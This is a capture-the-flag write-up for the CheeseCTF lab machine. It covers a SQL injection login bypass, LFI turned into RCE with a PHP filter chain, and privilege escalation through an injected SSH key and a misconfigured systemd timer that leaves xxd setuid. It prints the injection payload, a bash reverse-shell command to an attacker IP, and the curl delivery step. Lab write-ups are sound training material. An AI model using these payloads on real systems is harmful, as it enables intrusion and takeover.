CheeseCTF

In this CTF, I do SQLi, exploit vulnerability LFI, and lead it to RCE using tools, privilege escalation on /etc/systemd/system/exploit.timer service.

Reconnaisance

Figure 1

Figure 2

This was my first time doing Nmap scanning, and there were so many open ports. But the actual ports that are working are port 80 and port 22.

Enumeration

Figure 3

This is what the website looks like. It gives a cheese shop website title.

SQL Injection

Figure 4

The website has a login form. Can perform SQL injection to bypass the authentication.

Figure 5

I managed to bypass the login form using the payload below. It redirects us to the cheese shop admin panel.

' || '1'='1';-- -

LFI Vulenrability

Figure 6

Notice that we can perform an LFI attack at the end of the URL of the PHP object. Which is "file=<lfi payload>". Now time to do LFI2RCE.

LFI2RCE

Figure 7

For the LFI2RCE part, im using this tool https://github.com/synacktiv/php_filter_chain_generator; this tools help to generate a payload to the PHP filter with a reverse shell. After that, send the payload using curl, as shown in Figure 7. Don't forget to setup listener using netcat.

Command to use the tools:

python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/10.11.108.217/4444 0>&1\"'); ?>" | grep "^php" > payload.txt 

Command to send the payload using curl:

curl "http://10.10.244.5/secret-script.php?file=$(cat payload.txt)"

PrivEsc

Figure 8

For the Privilege Escalation part, I transfer the linpeas script to the victim machine.

Figure 9

Found the yellow color and red color that can be exploited to gain privilege escalation.

Figure 10

Based on Figure 9, we can write the ssh key in the "/authorized_keys" directory. Figure 10 shows that we created our own SSH key.

Figure 11

Copy the value of the RSA key inside id_rsa.pub and inject our key into the "/home/comte/.ssh/authorized_keys".

Login using ssh:

sudo ssh -i id_rsa username@ip

Figure 12

Then we have our user.txt flag.

Figure 13

To escalate to the root user, I'm using the command sudo -l. It looks like we can run sudo without a password on theexploit.timer service.

Figure 14

On the timer part, add the value 5s. So the service will start on boot in 5 seconds.

Figure 15

Restart the service, enable and start the service back. Ensure the service is runnin. At this point, i stuck a while because there is nothing happend.

Figure 16

After that, I ran Linpeas again and found that the "xx" is yellow; it looks like it can be exploited. The service in Figure 15 would trigger an exploit. service, which gave setuid permissions to the xxd binary, allowing it to run with elevated privileges.

Figure 17

Find the exploitation on GTFO bin site.

Figure 18

Craft the exploitation as shown in Figure 17. Then, log in again using SSH, but this time with the root user.

Figure 19

Now we have root flag.